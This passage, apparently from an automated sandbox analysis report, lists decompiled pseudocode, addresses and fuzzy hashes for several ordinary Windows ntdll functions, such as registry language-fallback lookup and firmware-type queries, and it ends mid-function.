                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                  • API String ID: 0-1676968949
                                                                  • Opcode ID: f5c25741b70d5445c5fafc73d755bdc82a15d8a85ba9b77c6f9d14970f7c44f8
                                                                  • Instruction ID: 16e3145ca7a413ae579879f0fecff518b8a898c17036811ad9324c756d02052b
                                                                  • Opcode Fuzzy Hash: f5c25741b70d5445c5fafc73d755bdc82a15d8a85ba9b77c6f9d14970f7c44f8
                                                                  • Instruction Fuzzy Hash: A651D1716007499BEB21CB98C948F2AB7E9AB85314F140AF9E8519B7E1D734FE01CB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0493E620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 93%
                                                                  			E0493E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E0493F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E049795D0();
						}
						if(_t78 != 0) {
							L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0497FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0497BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E04979600();
					if(_t97 < 0) {
						goto L6;
					}
					E0497BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L0493F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0497BB40(_t83, _t102 + 0x24, _t78);
								if(L049443C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0497BB40(_t84, _t102 + 0x24, _t94);
									if(L049443C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                                                  0x0493e620
                                                                  0x0493e628
                                                                  0x0493e62f
                                                                  0x0493e631
                                                                  0x0493e635
                                                                  0x0493e637
                                                                  0x0493e63e
                                                                  0x04995503
                                                                  0x04995503
                                                                  0x0493e64c
                                                                  0x0493e64c
                                                                  0x0493e651
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0493e661
                                                                  0x0493e665
                                                                  0x0499542a
                                                                  0x0493e715
                                                                  0x0493e71a
                                                                  0x0493e71c
                                                                  0x0493e720
                                                                  0x0493e720
                                                                  0x0493e727
                                                                  0x0493e736
                                                                  0x0493e736
                                                                  0x0493e743
                                                                  0x0493e743
                                                                  0x0493e673
                                                                  0x0493e678
                                                                  0x0493e67d
                                                                  0x0493e682
                                                                  0x0493e685
                                                                  0x0493e692
                                                                  0x0493e69b
                                                                  0x0493e6a3
                                                                  0x0493e6ad
                                                                  0x0493e6b1
                                                                  0x0493e6b2
                                                                  0x0493e6bb
                                                                  0x0493e6bf
                                                                  0x0493e6c0
                                                                  0x0493e6c8
                                                                  0x0493e6cc
                                                                  0x0493e6d5
                                                                  0x0493e6d9
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0493e6e5
                                                                  0x0493e6ea
                                                                  0x0493e6f9
                                                                  0x0493e70b
                                                                  0x0493e70f
                                                                  0x04995439
                                                                  0x0499545e
                                                                  0x0499545e
                                                                  0x00000000
                                                                  0x0499545e
                                                                  0x0499543b
                                                                  0x0499543e
                                                                  0x04995440
                                                                  0x04995445
                                                                  0x04995472
                                                                  0x04995475
                                                                  0x0499548d
                                                                  0x04995493
                                                                  0x049954a9
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049954ab
                                                                  0x049954b4
                                                                  0x049954bc
                                                                  0x049954c8
                                                                  0x049954de
                                                                  0x049954fb
                                                                  0x049954e0
                                                                  0x049954e6
                                                                  0x049954eb
                                                                  0x049954eb
                                                                  0x049954de
                                                                  0x00000000
                                                                  0x049954bc
                                                                  0x04995477
                                                                  0x0499547a
                                                                  0x04995480
                                                                  0x04995483
                                                                  0x04995486
                                                                  0x0499548b
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0499548b
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04995447
                                                                  0x04995447
                                                                  0x04995447
                                                                  0x04995447
                                                                  0x0499544e
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04995450
                                                                  0x04995452
                                                                  0x04995455
                                                                  0x0499545a
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0499545c
                                                                  0x0499546a
                                                                  0x0499546d
                                                                  0x0499546f
                                                                  0x00000000
                                                                  0x0499546f
                                                                  0x0493e70f

                                                                  Strings
                                                                  • InstallLanguageFallback, xrefs: 0493E6DB
                                                                  • @, xrefs: 0493E6C0
                                                                  • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0493E68C
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                  • API String ID: 0-1757540487
                                                                  • Opcode ID: b3ddb492e0dd59982cf257c98a1a531b3aed27e76c91d8ce7801b93a0ff96124
                                                                  • Instruction ID: c900f274bc0728a6056843be9097efa67fc01087011b485cd5abb00bf4e43502
                                                                  • Opcode Fuzzy Hash: b3ddb492e0dd59982cf257c98a1a531b3aed27e76c91d8ce7801b93a0ff96124
                                                                  • Instruction Fuzzy Hash: D951AFB2504315ABDB11DF28C440A6BB3E8AF89769F05093EF98597250F734EE04C7A2
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 049B51BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 77%
                                                                  			E049B51BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x4a105f0);
				E0498D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E0494EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E049B53CA(0);
						return E0498D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0497F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E04953690(1, _t117, 0x4911810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0497AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L04954620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0497AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E049B500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E04979860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                                                  0x049b51be
                                                                  0x049b51c3
                                                                  0x049b51c8
                                                                  0x049b51cd
                                                                  0x049b51d0
                                                                  0x049b51d3
                                                                  0x049b51d8
                                                                  0x049b51db
                                                                  0x049b51de
                                                                  0x049b51e0
                                                                  0x049b51e3
                                                                  0x049b51e6
                                                                  0x049b51e8
                                                                  0x049b5342
                                                                  0x049b5351
                                                                  0x049b5356
                                                                  0x049b535a
                                                                  0x049b5360
                                                                  0x049b5363
                                                                  0x049b5366
                                                                  0x049b5369
                                                                  0x049b5369
                                                                  0x049b536b
                                                                  0x049b536b
                                                                  0x049b5370
                                                                  0x049b53a3
                                                                  0x049b53a4
                                                                  0x049b53a6
                                                                  0x049b53ab
                                                                  0x049b53ab
                                                                  0x049b53ae
                                                                  0x049b53ae
                                                                  0x049b53b5
                                                                  0x049b53bf
                                                                  0x049b53bf
                                                                  0x049b5375
                                                                  0x049b5396
                                                                  0x049b53a0
                                                                  0x049b53a0
                                                                  0x00000000
                                                                  0x049b5396
                                                                  0x049b5377
                                                                  0x049b5379
                                                                  0x049b537f
                                                                  0x049b538c
                                                                  0x049b5390
                                                                  0x00000000
                                                                  0x049b5390
                                                                  0x049b51ee
                                                                  0x049b51f1
                                                                  0x049b5301
                                                                  0x049b5310
                                                                  0x049b5315
                                                                  0x049b5318
                                                                  0x049b531b
                                                                  0x049b5320
                                                                  0x049b532e
                                                                  0x049b5331
                                                                  0x00000000
                                                                  0x049b5331
                                                                  0x049b5328
                                                                  0x049b5329
                                                                  0x00000000
                                                                  0x049b5329
                                                                  0x049b51fa
                                                                  0x049b5235
                                                                  0x049b5236
                                                                  0x049b5239
                                                                  0x049b523f
                                                                  0x049b5240
                                                                  0x049b5241
                                                                  0x049b5242
                                                                  0x049b5246
                                                                  0x049b5247
                                                                  0x049b524e
                                                                  0x049b5251
                                                                  0x049b5267
                                                                  0x049b5269
                                                                  0x049b526e
                                                                  0x049b527d
                                                                  0x049b527e
                                                                  0x049b5281
                                                                  0x049b5282
                                                                  0x049b5287
                                                                  0x049b5288
                                                                  0x049b528a
                                                                  0x049b528f
                                                                  0x049b5294
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049b529a
                                                                  0x049b529c
                                                                  0x049b529e
                                                                  0x049b529e
                                                                  0x049b52a4
                                                                  0x049b52b0
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049b52ba
                                                                  0x049b52bc
                                                                  0x049b52bc
                                                                  0x049b52d4
                                                                  0x049b52d9
                                                                  0x049b52dc
                                                                  0x049b52e1
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049b52e7
                                                                  0x049b52f4
                                                                  0x00000000
                                                                  0x049b52f4
                                                                  0x049b5270
                                                                  0x00000000
                                                                  0x049b5270
                                                                  0x049b51fc
                                                                  0x049b51fd
                                                                  0x049b5202
                                                                  0x049b5203
                                                                  0x049b5205
                                                                  0x049b520a
                                                                  0x049b520f
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049b521b
                                                                  0x049b5226
                                                                  0x049b522b
                                                                  0x049b521d
                                                                  0x049b521d
                                                                  0x049b5222
                                                                  0x049b5222
                                                                  0x049b522d
                                                                  0x00000000

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID: Legacy$UEFI
                                                                  • API String ID: 2994545307-634100481
                                                                  • Opcode ID: b828335bdf7b25e858d930045380958cb01616e93c5e1f7ecea4af59cdb4e311
                                                                  • Instruction ID: 403c1c4c7c5e070e4e4388b1ce335392c369b1aae95a705a2766b8564ee976d8
                                                                  • Opcode Fuzzy Hash: b828335bdf7b25e858d930045380958cb01616e93c5e1f7ecea4af59cdb4e311
                                                                  • Instruction Fuzzy Hash: 38517D71A00709EFEB24DFA8CA40AADB7F9FF48718F55443DE589EB251D671A900CB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0495B944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 76%
                                                                  			E0495B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x4a2d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E04957D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E04A08CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E04979E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0497B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0497CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E04957D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E04A08F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0497AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x4a28628; // 0x0
								_v68 = _t77;
								_t78 =  *0x4a2862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x4a28628; // 0x0
							_t116 =  *0x4a2862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                                                  0x0495b94c
                                                                  0x0495b956
                                                                  0x0495b95c
                                                                  0x0495b95e
                                                                  0x0495b964
                                                                  0x0495b969
                                                                  0x0495b96d
                                                                  0x0495b96d
                                                                  0x0495b970
                                                                  0x0495b974
                                                                  0x0495b97a
                                                                  0x0495badf
                                                                  0x0495badf
                                                                  0x0495bae2
                                                                  0x0495bae4
                                                                  0x0495bae6
                                                                  0x0495baf0
                                                                  0x049a2cb8
                                                                  0x0495baf6
                                                                  0x0495baf6
                                                                  0x0495baf6
                                                                  0x0495bafd
                                                                  0x0495bb1f
                                                                  0x0495bb1f
                                                                  0x0495baff
                                                                  0x0495bb00
                                                                  0x0495bb00
                                                                  0x0495bb03
                                                                  0x0495bb03
                                                                  0x0495bacb
                                                                  0x0495bacf
                                                                  0x0495bad0
                                                                  0x0495bad1
                                                                  0x0495badc
                                                                  0x0495badc
                                                                  0x0495b980
                                                                  0x0495b980
                                                                  0x0495b988
                                                                  0x0495b98b
                                                                  0x0495b98d
                                                                  0x0495b990
                                                                  0x0495b993
                                                                  0x0495b999
                                                                  0x0495b99b
                                                                  0x0495b9a1
                                                                  0x0495b9a5
                                                                  0x0495b9aa
                                                                  0x0495b9b0
                                                                  0x0495b9bb
                                                                  0x0495b9c0
                                                                  0x0495b9c3
                                                                  0x0495b9ca
                                                                  0x0495b9cc
                                                                  0x0495b9cf
                                                                  0x0495b9d3
                                                                  0x0495b9d7
                                                                  0x0495ba94
                                                                  0x0495ba94
                                                                  0x0495ba98
                                                                  0x0495baa3
                                                                  0x049a2ccb
                                                                  0x0495baa9
                                                                  0x0495baa9
                                                                  0x0495baa9
                                                                  0x0495bab1
                                                                  0x049a2cd5
                                                                  0x049a2cdd
                                                                  0x049a2cdd
                                                                  0x0495babb
                                                                  0x0495babc
                                                                  0x0495bac2
                                                                  0x0495bac3
                                                                  0x0495bac3
                                                                  0x0495bac6
                                                                  0x00000000
                                                                  0x0495b9dd
                                                                  0x0495b9dd
                                                                  0x0495b9e7
                                                                  0x0495b9e7
                                                                  0x0495b9ec
                                                                  0x0495b9ec
                                                                  0x0495b9f1
                                                                  0x0495b9f5
                                                                  0x0495b9fa
                                                                  0x0495ba00
                                                                  0x0495ba0c
                                                                  0x0495ba10
                                                                  0x0495ba10
                                                                  0x0495ba12
                                                                  0x0495ba18
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0495bb26
                                                                  0x0495bb26
                                                                  0x0495ba1e
                                                                  0x0495ba1e
                                                                  0x0495ba23
                                                                  0x0495ba25
                                                                  0x0495ba2c
                                                                  0x0495ba30
                                                                  0x0495ba35
                                                                  0x0495ba35
                                                                  0x0495ba41
                                                                  0x0495ba46
                                                                  0x0495ba4c
                                                                  0x0495ba50
                                                                  0x0495ba54
                                                                  0x0495ba6a
                                                                  0x0495ba6e
                                                                  0x0495ba70
                                                                  0x0495ba74
                                                                  0x0495ba78
                                                                  0x0495ba7a
                                                                  0x0495ba7c
                                                                  0x0495ba8e
                                                                  0x0495ba90
                                                                  0x0495ba92
                                                                  0x0495bb14
                                                                  0x0495bb14
                                                                  0x0495bb16
                                                                  0x0495bb16
                                                                  0x00000000
                                                                  0x0495ba7c
                                                                  0x0495bb0a
                                                                  0x0495bb0d
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0495bb0f

                                                                  APIs
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0495B9A5
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                  • String ID:
                                                                  • API String ID: 885266447-0
                                                                  • Opcode ID: 22f951619492219eb92b348a2f0a3020c85cb1be4756124483f67ddfbabd84c8
                                                                  • Instruction ID: fa01bcc739c9b1f45bf06205172cb3bb32d851621b14784a4f3891b7ed83c52b
                                                                  • Opcode Fuzzy Hash: 22f951619492219eb92b348a2f0a3020c85cb1be4756124483f67ddfbabd84c8
                                                                  • Instruction Fuzzy Hash: 3D514771A08340CFD720DF29C59092ABBE9FB88614F24897EF98587365E771F944CB92
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0493B171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 78%
                                                                  			E0493B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x4a0f7a8);
				E0498D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0498D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0497D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
